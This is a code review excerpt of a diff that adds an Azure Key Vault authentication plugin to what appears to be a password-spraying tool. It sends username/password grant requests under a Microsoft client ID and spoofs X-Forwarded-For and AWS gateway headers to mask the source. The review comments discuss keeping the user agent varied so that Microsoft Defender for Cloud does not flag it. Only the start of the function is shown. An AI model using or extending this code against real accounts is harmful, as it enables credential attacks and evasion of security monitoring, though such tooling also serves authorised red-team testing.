plugins/azvault/azvault.py

```diff
@@ -0,0 +1,98 @@
+import requests
+import utils.utils as utils
+
+def azvault_authenticate(url, username, password, useragent, pluginargs):
+
+    data_response = {
+        'result': None,    # Can be "success", "failure" or "potential"
+		'error' : False,
+        'output' : ""
+    }
+
+    body = {
+        'resource': 'https://vault.azure.net',
+        'client_id': '1b730954-1685-4b74-9bfd-dac224a7b894',
+        'client_info': '1',
+        'grant_type': 'password',
+        'username': username,
+        'password': password,
+        'scope': 'openid',
+    }
+
+    spoofed_ip = utils.generate_ip()
+    amazon_id = utils.generate_id()
+    trace_id = utils.generate_trace_id()
+
+    headers = {
+        "X-My-X-Forwarded-For" : spoofed_ip,
+        "x-amzn-apigateway-api-id" : amazon_id,
+        "X-My-X-Amzn-Trace-Id" : trace_id,
+        "User-Agent" : useragent,
```

Comment:
In previous PR, you noted that this UA needed to be static to evade defender for cloud or something like that?

Reply:
It doesn't in this instance as I tested it against a few endpoints and it doesn't flag :)